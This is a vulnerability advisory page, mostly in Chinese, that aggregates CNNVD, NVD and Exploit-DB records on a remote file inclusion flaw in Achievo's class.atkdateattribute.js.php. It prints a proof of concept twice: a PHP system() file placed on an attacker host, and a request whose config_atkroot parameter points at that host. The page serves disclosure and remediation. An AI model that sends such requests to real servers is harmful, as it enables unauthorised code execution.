CVE-2002-1435
CVSS7.5
发布时间 :2003-04-11 00:00:00
修订时间 :2008-09-05 16:30:35
NMCOES    

[原文]class.atkdateattribute.js.php in Achievo 0.7.0 through 0.9.1, except 0.8.2, allows remote attackers to execute arbitrary PHP code when the 'allow_url_fopen' setting is enabled via a URL in the config_atkroot parameter that points to the code.


[CNNVD]Achievo远程文件包含命令执行漏洞(CNNVD-200304-068)

        
        Achievo是一款基于WEB的用于商业环境的项目管理工具。
        Achievo中的class.atkdateattribute.js.php脚本在包含文件时没有正确验证包含文件路径,远程攻击者可以利用这个漏洞以Achievo用户权限在系统上执行任意命令。
        Achievo中的atk/javascript/class.atkdateattribute.js.php脚本用于生成JavaScript代码,这个文件包含5个include_once变量,用于装载配置数据和功能函数,但引用包含文件时没有对文件路径进行正确检查,攻击者只要在自己控制的服务器上提供包含恶意代码的文件,并请求包含文件指向恶意代码所在的服务器,就可以导致任意命令以Achievo进程权限在系统上执行。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:achievo:achievo:0.9.1
cpe:/a:achievo:achievo:0.9.0
cpe:/a:achievo:achievo:0.8.1
cpe:/a:achievo:achievo:0.8.0_rc2
cpe:/a:achievo:achievo:0.8.0
cpe:/a:achievo:achievo:0.8.0_rc1
cpe:/a:achievo:achievo:0.7.3
cpe:/a:achievo:achievo:0.7.2
cpe:/a:achievo:achievo:0.7.1
cpe:/a:achievo:achievo:0.7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1435
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1435
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-068
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5552
(VENDOR_ADVISORY)  BID  5552
http://www.iss.net/security_center/static/9947.php
(VENDOR_ADVISORY)  XF  achievo-php-execute-code(9947)
http://archives.neohapsis.com/archives/bugtraq/2002-08/0235.html
(VENDOR_ADVISORY)  BUGTRAQ  20020822 Arbitrary code execution problem in Achievo
http://www.achievo.org/lists/2002/Aug/msg00092.html
(UNKNOWN)  CONFIRM  http://www.achievo.org/lists/2002/Aug/msg00092.html

- 漏洞信息

Achievo远程文件包含命令执行漏洞
高危 配置错误
2003-04-11 00:00:00 2006-08-03 00:00:00
远程  
        
        Achievo是一款基于WEB的用于商业环境的项目管理工具。
        Achievo中的class.atkdateattribute.js.php脚本在包含文件时没有正确验证包含文件路径,远程攻击者可以利用这个漏洞以Achievo用户权限在系统上执行任意命令。
        Achievo中的atk/javascript/class.atkdateattribute.js.php脚本用于生成JavaScript代码,这个文件包含5个include_once变量,用于装载配置数据和功能函数,但引用包含文件时没有对文件路径进行正确检查,攻击者只要在自己控制的服务器上提供包含恶意代码的文件,并请求包含文件指向恶意代码所在的服务器,就可以导致任意命令以Achievo进程权限在系统上执行。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在tk/javascript/class.atkdateattribute.js.php最上面去掉对于$config_atkroot的引用,这会包含默认位置上两级目录中的请求文件。
        * 使用如下代码替换chdir()调用:
        $config_atkroot = '../../';
        厂商补丁:
        Achievo
        -------
        Achievo 0.8.2版本即将推出,会包含针对这个漏洞的补丁。
        
        http://www.achievo.org

- 漏洞信息 (21745)

Achievo 0.7/0.8/0.9 Remote File Include Command Execution Vulnerability (EDBID:21745)
php webapps
2002-08-22 Verified
0 Jeroen Latour
N/A [点击下载]
source: http://www.securityfocus.com/bid/5552/info

Achievo includes a PHP script which is used to generate JavaScript (class.atkdateattribute.js.php). This script employs a number of PHP include_once() statements to call code contained in function libraries and grab configuration information. Attackers may subvert the variable ($config_atkroot) which is used to store the location of the external files and specify an arbitrary location, such as an attacker-supplied PHP script on a remote host.

Exploitation of this issue will enable the remote attacker to execute commands with the privileges of the webserver hosting the vulnerable software.


Create the following text file (ls.txt) and store it on the attacker host where it is publicly accessible:

<?php system('ls'); ?>

And cause the vulnerable script on the victim host to invoke it with the following request:

http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt? 		

- 漏洞信息

14538
Achievo class.atkdateattribute.js.php config_atkroot Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Unknown Vendor Verified

- 漏洞描述

Achievo contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to class.atkdateattribute.js.php not properly sanitizing user input supplied to the 'config_atkroot' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2002-08-22 Unknow
2002-08-22 Unknow

- 解决方案

Upgrade to version 1.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Achievo Remote File Include Command Execution Vulnerability
Configuration Error 5552
Yes No
2002-08-22 12:00:00 2009-07-11 03:56:00
Discovery of this issue is credited to Jeroen Latour <jlatour@calaquendi.net>.

- 受影响的程序版本

Achieva Achieva 0.9.1
Achieva Achieva 0.9 .0
Achieva Achieva 0.8.1
Achieva Achieva 0.8 .0 RC2
Achieva Achieva 0.8 .0 RC1
Achieva Achieva 0.8 .0
Achieva Achieva 0.7.3
Achieva Achieva 0.7.2
Achieva Achieva 0.7.1
Achieva Achieva 0.7 .0
Achieva Achieva 0.8.2

- 不受影响的程序版本

Achieva Achieva 0.8.2

- 漏洞讨论

Achievo includes a PHP script which is used to generate JavaScript (class.atkdateattribute.js.php). This script employs a number of PHP include_once() statements to call code contained in function libraries and grab configuration information. Attackers may subvert the variable ($config_atkroot) which is used to store the location of the external files and specify an arbitrary location, such as an attacker-supplied PHP script on a remote host.

Exploitation of this issue will enable the remote attacker to execute commands with the privileges of the webserver hosting the vulnerable software.

- 漏洞利用

The following example was submitted:

Create the following text file (ls.txt) and store it on the attacker host where it is publicly accessible:

&lt;?php system('ls'); ?&gt;

And cause the vulnerable script on the victim host to invoke it with the following request:

http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt?

- 解决方案

Exploitation of this and other remote file include issues may be limited by disabling both 'allow_url_fopen' and 'register_globals' in the local site PHP configuration.

The vendor has made fixes available for stable releases of the software. Fixes for development releases will also be reportedly made available.


Achieva Achieva 0.8 .0

Achieva Achieva 0.8 .0 RC2

Achieva Achieva 0.8 .0 RC1

Achieva Achieva 0.8.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站